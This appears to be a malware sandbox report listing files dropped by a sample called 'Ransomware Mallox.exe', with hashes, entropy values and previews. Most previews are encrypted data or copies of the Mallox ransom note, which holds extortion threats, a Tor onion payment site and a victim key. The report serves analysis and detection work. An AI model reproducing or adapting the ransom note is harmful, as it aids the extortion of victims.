                    Preview:../.....&.=..+3.j.6@.P%.#vF.N....K..}....[.:.........j....-..L.R.((.).........TO[....jac..}Kl.A.}*{.x.*..E.....c.3..].....b..K...j+....".dXQ*...>I.3k.n.}....y.h...eK{Q..8.=.P...].....m...K...r*.f...]"..#..'o.3 ..^5M#.Y-.EfX0..d......p.^.._..x....*.7........~GD-..1.9~...\.@q..T...RDH...r.)./s\x..s....K`9.-?..q.E.szp.=.l....z...~.".sY.U..4.?.O.v.w.].b...d...r.N.B..K..zy.0.....@_.=N..f....5(.kp:.Js\....'gxP.\,...*{fm...C.z.cI.]....T.3`...D.OW.Er.O 'z.Px.NA.r............].....6..>w..j..$)....C 6..,........#m.)uL!>.e]..<m=.I..p..&R.N.Q.S.!.....qJQ.hc$i..a.n...<.[..1..I..Z.d..IY..]..!8.H.vX..*.K..s^..>d.M.>@.D..P..$..Z.c.P..)...K..R9..h.x.tv.z$.n.n..m._.FG......XD^....-....|.>...1G>...Z....?....r....~._...N."....:..d....V....'.nn..".X].....M......N.=.9S.'.NH7........}.;.4Wb8......4m.m....mF.jn.....|5.6...M.N..~.Y.sr.[...l.../24...AIu......_0.'..`.@,a.F..Q.........Kl..' ....."(..vb.y.....H...XV....=..-.:.4.0....2K].8.1...s..

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\odc.officeapps.live.com\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1975C9BF-831E-44E7-8FD4-112275A074AD

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):162317
                    Entropy (8bit):7.998916240359993
                    Encrypted:true
                    SSDEEP:3072:9iFHgMu4MyFEG6CSsByrbFdVysImpjDhT7CxG8Y4O/rR7yDDxs5r4t2FxZ3RPr5w:9MA7hCSsBKdyQZnACR7yDer4UxZtr6
                    MD5:1D1F599D02C66255AABACBF8FC9D471E
                    SHA1:58383841957D9B43F691AFC9CF54D44863004C3B
                    SHA-256:CC1B5CE185D2798B5E6ECD32409E136D25848906CAB269B311294BB064325AA9
                    SHA-512:17D341142C54D633B924D8118CEEF96D0E1CEF795CCB52217DDBE19222F7D41FEB72C394AAB4D72B152AC78FDB2641EA3535E921534D67BC23026F0728B42DA7
                    Malicious:true
                    Preview:.......I. ...9.....!.v*.......6..;..JG.A...8. .........VR..\v..T....>?..........3.{.:..-q5.] 8b.=.. ...S.{a.*..t;..CU2Z..a......s.l.{JS\.g..........|.$.....'w~%...\.....J)f.8vm../i...^...bO...x....4UcO..)7...&....m..=hXgU..[A.h.RB.:..%.i.Mo=....!.\./!.9.....F7..[.#.D.O`.%..A...'.l..>s.{.wi.5.O..~T.!.M.D&.yJ.u..'E.....(w......9:9..d....-.}.g...n....+.4.7jhuN.u9..P.B9.|u.".Q..`2lpwP;P-=/..P.G...<$.,-K..^-I....QX......o.-. TO.......2].+.P..+...o.3GY.-Ss.......f.J1c.....?i...$ms.H.`.kP.W.5w...TS........oH..4..X._V.j!.u..I.&.9.8V.,...w..CU..a.F.....<@.("m.@.k.qen...{5.1s.zH..UI,.`.!.......'...@J+..g$...h...X..+....p..D.._....._....^...9#y.8....k.P..x.4.....C.j...q:..>7.Wh IY}.t.^...Rw...m.....5..m.g.*q._...r.=......f.{p.....X.Y.S.@..);x.*G..~....EQ.q..*./#..$.3.....Y.z..Tw..wj....{...=...P .V.....ic..........eW.......Y.....-.Y..H.....i..5.H..c.nZ9@.`Ffi..T0..oO.Yy..6X...'..=O.FpX..^j..w.\.,...I?...q..q..l{.....h.b.....d..p6.v. ..3.O.]p9V.`..{

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7FDF1322-9EAD-442A-85C2-C39D5CC6893F

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):162317
                    Entropy (8bit):7.9988577875993645
                    Encrypted:true
                    SSDEEP:3072:wcxj2V8yw+xHVnrFtaUi/Pu/CXUMuxBuEqJeBvKOJkv8n:vUZxXty/P6LMQBuErvLo8n
                    MD5:18AF0DE4711AE06F06F21C94C4998341
                    SHA1:BB3BE56B53CB3BF381CDADE3F1F865038C2B73FF
                    SHA-256:CA48C0D0D3CF2EE657FF0C4B6388693C8ED38DE4918A264366252392F13F65D0
                    SHA-512:AB0850268C195725A0EC7F05084E7238D7A15DE33620FDD9D778E5857EFD731A7A03B8DDA939B6465B07738201CA50F12EAD0ADC7E5E4F2A036665A0A197E58F
                    Malicious:true
                    Preview:...,.pyY..l.9|X...I..=.+......E..2....a%,^....c.#..M.|.V.."(!.. ...n/*....p.<...P.`.......'~.....O...v.%..wR{I..b..A`x.mU?..........K..;....EW..l..u...L.k.Q...W..j....N3H.u....$.S.C......rIS&.q..RK,..T.w.M..yO...3.#.........$j5E<j4.\..^.d.WbHy..g./.c.aM...Q..Iz.....j.*..*.ID..=....d4.O.......#..L...3+..A.%e..........=.....u!.......Yvr..b....7Z...*..4.......d....L......Q.#.;.N..................[..&.A4.X..forB...u*.w.......2).d.....F..<*W..Y+T:...S.NI.H.En.t...N......J...p6jh...+|.....]......8.....7..>..<.[../.ka.;. >'Td_:.kA.i..d..g.'...AW.*E...QD.[S.R...r.Q...-?..........O.7.c...!...#......./Z.H...Fs#[...".V......+....*......S......8..M.G.UI..[...h.(M7+....D...........n...Tx...m8...\.....n..f.pk......Y..Z`w.I....F<6f.H..i...I.Y=S..4Z..Y:...j...t.@.4.C-l.0.X.Ru7I...uf.h......Z].l.s.....?.6......yt...!.\0ru...:...I..^..p.(..(W.I'`J..Y..e-..-XeU..d.....k.xT....2..@..<M..#6....._.j..O... .?V.rr.......k.Q.f....f..e.".....C.?..z.v.C.`.

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\Wef\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1062665
                    Entropy (8bit):7.999812973476683
                    Encrypted:true
                    SSDEEP:24576:g/YuIXTLRbqWzq6IAgyZAThBqRu8mmg517wkalLpqNjE:g/KRWWzqmZ8SIzLDUkalgjE
                    MD5:82E8FF5773BB89E5F31463EFB22DC367
                    SHA1:971A62219E029902621092EC81DDEB6B5E9D3EA9
                    SHA-256:39C14AD5AA7B18CFE1772B8F619F59DEBAD3F15EDF9A7384F038BFB4EDC7617E
                    SHA-512:6F4CEAACB0D68D9195C257915743D645B4E87CA81C3076B9B550FDC77AE4B6D809DF7303EE0A1669E96861809FC9B0763957CECB452E951A49198AE92FF5887B
                    Malicious:true
                    Preview:.#.o.V.l.....E.|.,V..%.>N...V]L....,.[&....;..M.'0...\R.yO>.....>gU..S.'KC...mD.F?.....O..+....a....]...?.wR...yg.g..t..d...y.....6...#..Pp..[o.....+u..E..fq..RB.5..*..I`..P.{(..a.K..|...g"^ct.D....Bl..0...9A..JPu.N.y.....X...r....>[f....vx.iyY....p....v.d..PE0.!bwbx....}.s.x.=....4..g`....r....... ........R.fn:E....@.5J...c.I...o7fF........03..L../.v=.C<.........^...Jmf6I5R..S?.JE..:.,.K...@.(.~.........m.....X.7.Y.....1.\........c=./.^....".t.xv2...T.......].....K.V.Vr...H.c..N;.....?...-.c.R......`...&|N.m..`.oK.A.|.....(`xCD...7.....r.`.#...j.5 a...;[[..-... ......b..B..M.m.;+..{+...!!.....G.e".Z.26/...-.....T1.K....>..09.......GG..O...w6u\../|...-.UO..7.h..^-..@&..8,_....Kv...Cg...$....... P........x.Ru.6w.N.pOS......%../...f"y.s>...(.<..Kg.p.......C...75....1.?.......h38>.>.vd..Y..SX.lF...y.?XZ._u.i..N..J.]V..R.ns6......GE.cyv.g........_.:...Pd.R.!..d.g.)..1....r..=l....)l.e......|4.zA.~{I....1..vW....C.W@...?m.aK..B...<Q.cg*..

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11446v1.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):10837
                    Entropy (8bit):7.981645988466751
                    Encrypted:false
                    SSDEEP:192:7iNwaxw48K/SQm9yMyLElxGyGa7OyqLMVLr+Yff+QrktQL/2LGh8a/Z6DeNS1vG:7kwavFWYyP7sM5+of+sk6/2yhz/wRRG
                    MD5:BF5445A840EBA94726C76E5D5181D7E7
                    SHA1:FCDA6C1F66DA692D5B1F5A63CCC98559BBBB1C25
                    SHA-256:B2E94C328926C2C38DE37750D66C2EF6BFD5079C452BDCF9B044E0B7443FFDC5
                    SHA-512:FC421B7BD9CB737E25FDB60F7BB832FF469239A7F705E2781D193BCE4D8FDA444FD009B8095E3771E67BC0B9DE143CB47B7F0F30EA7ED5FF24E1AA27117A5DBE
                    Malicious:false
                    Preview:../.. ..Yr.z....=fh'.......Q.J.r....d.\T...F.o..w.cF%...a...@at.ws'.&..4.8X#v..]V.0......Ev......d>^.~...p...7&Czv/i...)._l..*..R>\..aFZ.....m..8.:...z.b.&..C)P......d...........R.A.h.D}.K...c....r..u..\e\.BM..$....wb.\..O.v...g....G......+..N.........t8...H..&;..Y..rnt..{qOD-.H..&.G..\...bW..V...s..8o1.....25.Y..p...i...K.xbgG.p..c..{8.]..O.........:..q...:2.w{.b...X.Ta....&..G.2..!..[...f...P.....t.r.....e...{y.........#..d.q.....f....23....L.......'M<.@.U.-7..L..........2.x...PT.1<.....A.....b..d%^l...n....P.2.x.c.............\o1O\........+P[B...y...K.w..02..u....$9P..KK.<%h.}............|...T...!....?..~T.TH....C..q>.GR..x.:.5L.i|[G.ay.xy..}n.[..B.........qz.3>.t'Yq_..V..........z0.......[$s.*xD.x..Fp.o.{t..jf......#...X}.oT..0.,.....g.T.....PlOA!;.bf...!B.i8.;w......yN....{m.{P<.".A......m...2..$.KPF.*...w......|I.a.....D.<n&.ym,<<>.X.24..8=p.*e .j.....".d.2..&....P...6.,.]..^.=\4.......6/...g.G..#...J.A.H..-e..W..C.m...\...(O...

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):44266
                    Entropy (8bit):7.996461239470519
                    Encrypted:true
                    SSDEEP:768:SDq2gSeQag3oxpofbgXMa/oVr2SM5yP+CfewOpreLS4s6tsm+/0iHwYUdQaNE6hR:S2rgqK8Z/n5ymCWwOpiOOtsm+GDuGhUu
                    MD5:EA55BA878C9868F0E1C80B51766CD493
                    SHA1:C36535A7F462F47EF4EFF8B06BD3BC36212B06BE
                    SHA-256:3C8F1522D034EBF1A900E688162750A08823AB6ACEFC131501BDF549497D1D14
                    SHA-512:4228A53C8FB2F28D163F9DDD16F12E700CADC8E6CEC7220CDB807F8FE35FD11F92F30946E42F52EA9C3A617915022F1BDF8DBD00E1C77B8BB8970D1E62AFA902
                    Malicious:true
